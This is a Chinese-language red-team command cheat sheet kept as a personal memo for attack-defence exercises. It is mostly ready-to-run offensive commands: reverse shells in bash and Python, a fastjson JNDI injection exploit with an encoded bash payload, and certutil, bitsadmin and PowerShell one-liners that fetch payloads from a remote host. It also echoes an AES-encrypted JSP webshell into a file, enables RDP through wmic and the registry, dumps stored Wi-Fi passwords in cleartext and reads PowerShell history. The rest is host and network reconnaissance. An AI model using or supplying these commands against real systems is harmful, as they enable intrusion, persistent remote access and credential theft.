攻防常用命令
攻防对抗中常用的命令，记录于此作为备忘录
certutil powershell探测出网
certutil -urlcache -split -f http://pibfq6603bhlew7kjztwvnepwg26qv.burpcollaborator.net
powershell Invoke-WebRequest "http://aq4xs444jvmwj3831uxpe9cl6cc20r.burpcollaborator.net/"
fastjson执行命令
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,cGluZyBgd2hvYW1pYC4xZnUwYnguZG5zbG9nLmNu}|{base64,-d}|{bash,-i}" -A "x.x.x.x"
Linux写文件
echo xxxxx== |base64 -d > /var/www/html/1.jsp
Linux反弹shell
bash -i >& /dev/tcp/[ip]/5555 0>&1
exec 5<>/dev/tcp/[ip]/5555;cat <&5|while read line;do $line >&5 2>&1;done
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[ip]",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Linux探测
for i in 192.168.0.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i is alived; fi; done
Linux查找文件
find / -name passwd
powershell、certutil写文件
certutil编码文件 certutil -encode 1.txt output.txt
certutil解码文件 certutil -decode output.txt input.txt
powershell写入 powershell -c "'xxxxxxxx' | Out-File input.txt -Append"
powershell写入方法2 powershell -c "add-content C:\1.bat -value \"test\""
powershell写入方法2后续(去除换行) powershell "-join((gc -LiteralPath \"c:\1.bat\"))"
windows 2008 开启3389
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
windows下载文件常用命令
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.28.128/payload.txt','payload.exe')
bitsadmin /transfer n http://192.168.28.128/payload.txt C:\Users\administrator\Desktop\1.txt
certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt test.php
windows写文件
echo ^<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%^> >> C:/x/x.jsp
echo ^<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%^> >> C:/x/x.jsp
echo ^<%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%^> >> C:/x/x.jsp
windows常用的系统变量
查看当前用户目录%HOMEPATH%
查看当前目录%CD%
列出用户共享主目录的网络路径%HOMESHARE%
列出验证当前登录会话的域控制器名%LOGONSERVER%
列出了可执行文件的搜索路径%Path%
列出了处理器的芯片架构%PROCESSOR_ARCHITECTURE%
列出了Program Files文件夹的路径%ProgramFiles%
列出了当前登录的用户可用应用程序的默认临时目录%TEMP% and %TMP%
列出了当前登录的用户可用应用程序的默认临时目录%TEMP% and %TMP%
列出了包含用户帐号的域的名字%USERDOMAIN%
列出操作系统目录的位置%WINDIR%
返回“所有用户”配置文件的位置%ALLUSERSPROFILE%
返回处理器数目%NUMBER_OF_PROCESSORS%
powershell地址%PSModulePath%
windows强制停止进程
停止指定pid进程 taskkill /f /pid 3352
停止指定exe taskkill /f /im explorer.exe
windows探测
for /l %i in (1,1,255) do @ping 192.168.0.%i -w 1 -n 1 | find /i "ttl"
for /l %i in (1,1,255) do @ping 192.168.0.%i -w 1 -n 1 | find /i "ttl">>"c:\a.txt"
for /l %i in (1,1,255) do @ping 192.168.%i.1 -w 1 -n 1 | find /i "ttl"
windows查找文件
dir c:\ /s /b | find "win.ini"
dir c:\ /s /b | find "navicat.exe"
dir c:\ /s /b | find "finalshell.exe"
windows查看历史命令
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type %appdata%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
windows查看计划任务
schtasks /QUERY /fo LIST /v
windows自带压缩、解压缩
windows自带的解压命令 iexpress
windows自带的压缩命令（输出文件扩展名可自行指定，如 zip、rar、cab） makecab 1.doc 1.zip
解压命令 expand 1.zip 1.doc
先把要压缩的多个文件名写入txt dir /b >>name.txt
压缩 makecab /f name.txt /d maxdisksize=1024000
解压缩 expand 1.cab -f:* c:\test\
windows计算文件hash、设置终端代理
certutil.exe -hashfile 1.txt
windows设置终端代理 set http_proxy=http://127.0.0.1:1080
主机收集
查看rdp链接记录 cmdkey /list
查看dns记录 ipconfig /displaydns
查看arp记录 arp -a
查看在线用户 qwinsta
查看系统的盘符 wmic logicaldisk where DriveType=3 get DeviceID
查看所有用户的sid wmic useraccount get name,sid
windows查看桌面目录 reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /s
查看浏览记录 reg query "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs"
显示系统中曾经连接过的无线网络配置文件（明文密码见下一条）
netsh wlan show profiles
查看wifi密码
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
查看当前系统是否是VMWARE
wmic bios list full | find /i "vmware"
查看当前系统是否启用了屏保密码保护以及屏保超时时间
wmic desktop get screensaversecure,screensavertimeout
查看是否跨网段
Windows:route print
Linux:route
mac:netstat -nr
查看防火墙规则
netsh firewall show config
netsh firewall show state
根据进程查找进程文件
wmic process where name="xxxx.exe" get processid,executablepath,name
wmic process where name="chrome.exe" list full
获取操作系统命令
wmic OS get Caption,CSDVersion,OSArchitecture,Version